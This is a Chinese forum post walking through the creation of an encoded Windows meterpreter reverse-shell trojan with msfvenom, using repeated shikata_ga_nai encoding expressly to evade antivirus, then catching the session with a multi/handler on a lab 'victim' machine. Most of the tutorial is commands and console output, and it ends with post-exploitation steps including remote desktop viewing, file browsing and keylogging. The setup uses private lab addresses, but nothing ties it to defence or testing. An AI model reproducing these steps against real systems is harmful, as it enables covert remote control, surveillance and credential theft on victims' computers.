设为首页 收藏本站
查看: 2002|回复: 0

Metasploit 生成***反弹shell-Snow 狼

[复制链接]

尚未签到

发表于 2018-8-19 06:00:38 | 显示全部楼层 |阅读模式
  Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报
  特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及224个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
  Metasploit自带上百种漏洞,还可以在online exploit building demo(在线漏洞生成演示)上看到如何生成漏洞。这使自己编写漏洞变得更简单,它势必将提升非法shellcode的水平,并且扩大网络阴暗面。与其相似的专业漏洞工具,如Core Impact和Canvas已经被许多专业领域用户使用。Metasploit降低了使用的门槛,将其推广给大众。
  接下来开始简单而又有趣的小实验
  ***机:KaliLinux--2018.1最新版的(刚安装的时候跑了很多坑)                                ip:172.16.221.243
  受害者:windows7                               ip:172.16.221.153
  1.首先生成一个***文件
  (1)msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5  LHOST=172.16.221.243 LPORT=12315  -f exe >  /root/muma.exe
  msfvenom用于生成***文件
  -p –payload < payload> 指定需要使用的payload(***荷载)
  msfvenom -l payloads 查看所有的***载荷
DSC0000.jpg

  windows/meterpreter/reverse_tcp 我们选择使用的***载荷
  -e –encoder [encoder] 指定需要使用的encoder(编码器)
  msfvenom -l encoders 查看编码
DSC0001.jpg

  x86/shikata_ga_nai 我们所选择的编码格式(用于免杀)
  -i 5 –iterations < count> 指定payload的编码次数为5次(次数越多免杀的概率越大)
  LHOST指定ip地址
  LPORT指定监听的端口可任意更改
  -f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
  /root/muma.exe 指定到生成的目录
  2.将***文件移动到受害者主机
  3.我是直接使用图形化armitage方便后面的操作
DSC0002.jpg

  (1)use exploit/multi/handler 进入
  (2)msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 选择此***载荷
  payload => windows/meterpreter/reverse_tcp     此为回显内容证明已切换到此***载荷
  (3)msf exploit(multi/handler) > show options 查看此***载荷的配置
  

  Module options (exploit/multi/handler):  

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  

  Payload options (windows/meterpreter/reverse_tcp):
  

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
  LHOST     172.16.221.243   yes       The listen address
  LPORT     18609            yes       The listen port
  

  Exploit target:
  

  Id  Name
  --  ----
  0   Wildcard Target(回显内容)
  
(4)msf exploit(multi/handler) > set LPORT 12315 将端口修改为生成***文件时设置监听的端口
  LPORT => 12315(回显内容证明修改成功)
  
(5)msf exploit(multi/handler) > show options查看***载荷的配置
  

  Module options (exploit/multi/handler):
  

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  

  Payload options (windows/meterpreter/reverse_tcp):
  

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
  LHOST     172.16.221.243   yes       The listen address
  LPORT     12315(看这里端口已经更改了)            yes       The listen port
  

  Exploit target:
  

  Id  Name
  --  ----
  0   Wildcard Target
  

  (6)msf exploit(multi/handler) > exploit运行(在受害者主机别忘了运行你的***文件)
  [] Started reverse TCP handler on 172.16.221.243:12315
  [] Sending stage (179779 bytes) to 172.16.221.153
  
  • Meterpreter session 9 opened (172.16.221.243:12315 -> 172.16.221.153:50596) at    2018-04-27 15:17:12 +0800
      

      
  • Meterpreter session 11 opened (172.16.221.243:12315 -> 172.16.221.153:50679) at 2018-04-27 15:37:31 +0800  出现以上内容即为成功
      

      4.刚才说过图形化方便操作,接下来给大家介绍一些小操作
    DSC0003.jpg

      电脑出现这样代表可以***了
      鼠标右键会出现可用的载荷
    DSC0004.jpg

      运行一些shell命令,建议用meterpreter shell 来运行shell命令 我在做实验的时候其他的shell命令并不会运行
    DSC0005.jpg

      getuid   获得uid
      sysinfo   查看系统
      run vnc   开启vnc
      getdesktop     远程监控桌面
      浏览文件目录
    DSC0006.jpg

      键盘记录器都懂得
    DSC0007.jpg

      基本就是这些小操作



  • 运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
    2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
    3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
    4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
    5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
    6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
    7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
    8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

    所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.iyunv.com/thread-553572-1-1.html 上篇帖子: Unix/Linux shell脚本中 “set -e” 的作用 下篇帖子: linux中 bash shell terminal的解释
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    扫码加入运维网微信交流群X

    扫码加入运维网微信交流群

    扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

    扫描微信二维码查看详情

    客服E-mail:kefu@iyunv.com 客服QQ:1061981298


    QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


    提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


    本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



    合作伙伴: 青云cloud

    快速回复 返回顶部 返回列表